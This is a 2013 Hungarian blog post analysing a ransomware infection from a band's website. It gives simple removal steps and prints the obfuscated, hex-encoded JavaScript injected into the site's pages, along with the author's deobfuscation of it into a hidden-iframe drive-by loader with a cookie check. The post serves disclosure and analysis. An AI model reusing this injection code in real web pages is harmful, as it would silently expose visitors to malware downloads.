Ransomware a Punnany Massif weboldalán

VtSoftware - 2013. Augusztus 13. 21:57 - 810 megtekints

... majd 25.000,-Ft-ért cserébe ettől a bűcselekménytől eltekint. :)
Egy Ransomware programot fogtam...

Íme egy kép a figyelmeztetésről.
Mobiltelefonnal készült, mivel megbénítja a számítógépet, nem engedett PrintScreent-sem készíteni.

KÉP

Ez a dolog egy kissé egyszerűen leszedhető.
A számítógépet el kell indítani Csökkentett módban.
Ahogy a számítógépünk elindult nyissuk meg az átmeneti könyvtárat.
Ez a könyvtár alapbeállítás szerint:
- XP: C:\Documents and Settings\#felhasználónév#\AppData\Local\Temp\
- Windows 7-nél: c:\Users\#felhasználónév#\AppData\Local\Temp\

Ha nem találjuk ezt a mappát, nyissuk meg a Sajátgépet, majd a címsorba írjuk be:
%TEMP%
Ekkor átkerülünk az átmeneti fájlok könyvtárába.
A benne található fájlokat Shift+Del billentyűkombinációval töröljük.
A Del gomb csak a Lomtárba helyez, a Shift+Del viszont a Lomtár kihagyásával azonnal töröl.
Ha valamit nem tudunk törölni, ugorjuk át, a vírus fájljait nagy valószínűséggel ki tudjuk törölni.

Ha ez megvolt indítsuk a gépünket újra, és nincs gond.

2013. 08. 13. 21:55
A törlés utáni indításkor a gép figyelmeztet, hogy RunDLL32 nem talál egy fájlt... stb.
Ezt OK gombra klikkeléssel tüntessük el.
A gond, hogy minden indításnál elindítaná a gép...
... erre még keresem a megoldást!!!

A vírus módosításai:
A támadás első lépcsője a Punnany Massif weboldala.
A következő kódokat az összes oldalon megtalálni, nem is egyszeri alkalommal:



#0f2490#
echo "<script type=\"text/javascript\" language=\"javascript\" >
try{if(window.document)--document.getElementById('12')}catch(qq){
if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"74837c7182777d7c2e888
88874747436372e89182e846f802e8581702e4b2e727d71837b737c
823c7180736f8273537a737b737c8236357774806f7b73353749181
82e8581703c8180712e4b2e357682827e483d3d737c736f717d7b83
7c77716f88777d7c733c77823d7175773b70777c3d767f72465e4179
673c7e767e3549182e8581703c8182877a733c7e7d817782777d7c2
e4b2e356f70817d7a8382733549182e8581703c8182877a733c707d
807273802e4b2e353e3549182e8581703c8182877a733c767377757
6822e4b2e35477e863549182e8581703c8182877a733c8577728276
2e4b2e35457e863549182e8581703c8182877a733c7a7374822e4b2
e353f7e863549182e8581703c8182877a733c827d7e2e4b2e353f7e8
6354918182e77742e362f727d71837b737c823c757382537a737b73
7c825087577236358581703537372e89182e727d71837b737c823c8
58077827336354a7277842e77724b6a358581706a354c4a3d72778
44c353749182e727d71837b737c823c757382537a737b737c825087
5772363585817035373c6f7e7e737c725176777a723685817037491
82e8b188b1874837c7182777d7c2e617382517d7d79777336717d7
d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e
6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f827
3363749182e846f802e73867e7780732e4b2e7c73852e526f82733
63749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f8
7814b4b3e372e7c526f87814b3f49182e73867e7780733c817382627
77b7336827d726f873c75738262777b7336372e392e41443e3e3e3e
3e384042387c526f87813749182e727d71837b737c823c717d7d7977
732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717
d7d797773646f7a837337182e392e304973867e778073814b302e39
2e73867e7780733c827d555b62618280777c7536372e392e36367e6
f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e3030
3749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b
732e372e89182e846f802e81826f80822e4b2e727d71837b737c823
c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e
3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a
737c7582762e392e3f49182e77742e362e362e2f81826f80822e372
e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d79
77733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582
762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b1
82e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2
e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c7
17d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491
82e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d7
1837b737c823c717d7d7977733c7a737c75827649182e807382838
07c2e837c7381716f7e73362e727d71837b737c823c717d7d79777
33c818370818280777c75362e7a737c3a2e737c722e372e3749188
b1877742e367c6f8477756f827d803c717d7d797773537c6f707a73
7237188918777436557382517d7d7977733635847781778273726
d837f35374b4b434337898b737a817389617382517d7d79777336
35847781778273726d837f353a2e354343353a2e353f353a2e353d
3537491818888888747474363749188b188b18\";
z=[];for(i=0;i<a.length;i+=2){
z.push(parseInt(a.substr(i,2),16)-14);}
eval(ss[\"fr\"+\"omCharCode\"].apply(ss,z));</script>";


#/0f2490#


Ez a kód, kis fejtegetés után a következő:

function zzzfff() {
var wsb = document.createElement('iframe');

wsb.src = '!_URL_!'; // url törölve!
wsb.style.position = 'absolute';
wsb.style.border = '0';
wsb.style.height = '9px';
wsb.style.width = '7px';
wsb.style.left = '1px';
wsb.style.top = '1px';

if (!document.getElementById('wsb')) {
document.write('<div id=\'wsb\'></div>');
document.getElementById('wsb').appendChild(wsb);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
}
}

Ez annyit tesz, hogy leellenőrzi támogatja-e a látogató gépe a sütiket.
Ha igen, megnézi, hogy a "visited_uq" cookie létre van-e hozva a "bűnöző" számítógépén.
Ha nincs, létrehozza, mert a süti kell a további lépésekhez.
Ha létrehozta a sütit, megnyitja a törölt URL-t, amit letöltve süti nélkül egy átirányítást kapunk egy lényegében
ártatlannak tűnő fórum oldalra.